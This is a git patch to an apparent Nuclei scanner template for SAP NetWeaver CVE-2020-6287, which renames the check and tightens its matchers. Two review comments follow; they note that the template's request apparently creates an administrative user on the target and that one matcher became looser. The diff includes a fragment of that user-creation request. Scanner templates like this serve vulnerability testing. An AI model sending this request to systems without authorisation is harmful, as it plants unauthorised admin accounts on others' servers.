From 55c0e1b103348ded152698f426b1c3db5534b708 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 5 Jun 2021 10:29:59 +0530
Subject: [PATCH] Improved matchers for CVE-2020-6287
---
 cves/2020/CVE-2020-6287.yaml | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index 2d5c79bace..e33fc9bba9 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-6287
 info:
- name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
+ name: Remotely Exploitable Code On NetWeaver
 author: dwisiswant0
 severity: critical
 tags: cve,cve2020,sap
@@ -11,6 +11,7 @@ info:
 - https://launchpad.support.sap.com/#/notes/2934135
 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
+ - https://github.com/chipik/SAP_RECON
 requests:
 - payloads:
@@ -23,12 +24,16 @@ requests:
 Connection: close
 sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('§data§')}}userDetails
+ matchers-condition: and
 matchers:
 - type: word
 words:
- - "urn:CTCWebServiceSi"
+ - "CTCWebServiceSi"
+ - "SOAP-ENV"
 part: body
+ condition: and
+
 - type: status
 status:
 - 200
@@ -36,4 +41,5 @@ requests:
 - type: word
 words:
 - "text/xml"
+ - "SAP NetWeaver Application Server"
 part: header
\ No newline at end of file
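Review bot: In the first hunk (`@@ -1,7 +1,7 @@`), the new `name` drops the only statement of what this template does to a target. The removed title said it creates an administrative user through the LM Configuration Wizard, and the request body in a later hunk still submits `userDetails` to `SPC_UserManagement.cproc`, so a match appears to mean an account was actually created. Someone triaging a finding titled "Remotely Exploitable Code On NetWeaver" cannot tell that cleanup is needed. I would keep the side effect visible with `description: Sends the LM Configuration Wizard user-creation request; a match means an account was created on the target and must be removed afterwards.` and add `intrusive` to the `tags:` line. The `info:` block continues outside this hunk.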
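Review bot: The header matcher in the last hunk (`@@ -36,4 +41,5 @@`) gains a second word but no `condition: and`, so its words fall back to the default `or` and a response carrying either `text/xml` or the server banner satisfies it. That leaves this matcher looser than it was before the commit, while the body matcher in the previous hunk did receive `condition: and`. If both values are meant to be required, add `condition: and` after `part: header`. Requiring the banner would miss hosts that suppress or rewrite what is presumably the `Server` header, so if that trade-off is not wanted, keep `text/xml` as the only word in this matcher.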